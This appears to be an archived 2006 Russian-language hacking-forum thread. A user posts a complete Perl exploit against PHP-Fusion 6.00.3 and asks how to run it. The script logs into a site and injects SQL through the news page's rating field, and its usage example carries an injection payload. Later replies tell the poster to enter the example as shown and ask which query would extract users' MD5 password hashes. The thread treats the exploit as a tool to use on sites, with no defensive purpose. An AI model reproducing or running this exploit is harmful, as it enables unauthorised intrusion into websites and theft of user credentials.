PDA

Просмотр полной версии : Вопрос по использованию сплоита для php-fusion 6.00.3


Romaxa55
20.02.2006, 19:46
Парни сорри за ламерство но я уже не знаю что делать, значит вот сам сплоит.
#!/usr/bin/perl
#Exploit for PHP-Fusion 6.00.3 Released
#Coded by:krasza[krasza@gmail.com]
#Greetz: http://www.securityreason.com
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Cookies;
if(!$ARGV[3]){
print<<EOF;
Exploit for PHP-Fusion 6.00.3 Released
Coded by krasza
Contact me:krasza\@gmail.com
Greets:
-http://www.securityreason.com
-http://www.revival.pl
-mulander

Usage:
perl phpfusion.pl url login pass sql
url-url hack site with [php fusion's directory]
login-your login
pass-your password
sql-[sql code]
Example:
\t perl phpfusion.pl http://server/php-fusion admin password 3','31337','HACKED')/*
EOF
exit;
}
my $url=shift;
my $login=shift;
my $haslo=shift;
my $sql=shift;
$url=$url."/news.php?readmore=1";
my $ua = new LWP::UserAgent;
$ua->agent("Exploit for PHP-Fusion" . $ua->agent);
$ua->cookie_jar( HTTP::Cookies->new('file' => 'ciasteczka.txt','autosave' => 1,));
print "[+]Connecting to $url...\n";

my $zadanie = new HTTP::Request POST => $url;
$zadanie->content_type('application/x-www-form-urlencoded');
$zadanie->content('user_name=' . $login . '&user_pass=' . $haslo . '&login=Loguj');
my $wynik = $ua->request($zadanie);
if ($wynik->is_success){
print "[+]Connected to $url\n";
#LOGIN JEST PRAWIDLOWE
}else{
print "[-]Connected failed to $url\n";
print "[-]Error:".$wynik->message."\n";
exit;
}
print "[+] Logging In $url...\n";
$zadanie = new HTTP::Request POST => $url;
$zadanie->content_type('application/x-www-form-urlencoded');
$zadanie->content('rating='.$sql.'&post_rating=Dodaj+ocen%EA');
my $wynik2 = $ua->request($zadanie);
if ($wynik2->is_success){
print "[+] Sql query isn't done!\n";
}else{
print "[-]Sql query is done\n";
}
Но никак не пойму что именно вводить.
perl phpfusion.pl http://server/php-fusion admin password 3','31337','HACKED')/* смущают последние строчки. Подскажите кто знает.

Inferno
20.02.2006, 19:56
А что там смущает если там написано Example:
шо значит пример!

k1b0rg
20.02.2006, 20:15
perl phpfusion.pl http://server/php-fusion admin password 3','31337','HACKED')/*
все правильно, он работает со скулей, все норма, так что вводи как показано в примере

Romaxa55
20.02.2006, 21:45
Спасиб Киборк что понял меня правильно, сейчас опробую и вывешу результат и тему можно будет закрывать ;)

Mina
21.05.2006, 00:13
A што дальше?
[-]Sql query is done

Zitt
21.05.2006, 19:10
DimaHbl4 ну что может сплойт делать или позволяет выполнять команды или лог\пасс\хеш выдаёт

Susel
06.06.2006, 03:09
Помогите.... Этот эксплоит приведённый выше, что делает.....добывает хеш??? Если да то, где он его сохраняет... После выполнения появляется файл тип лога, но там ни хрена нет... Help Please!!! )))

netadmin
07.08.2006, 13:21
a kntonibud znait kakuiu sql query nada dla etava vipolnit shtob dastat md5 pwd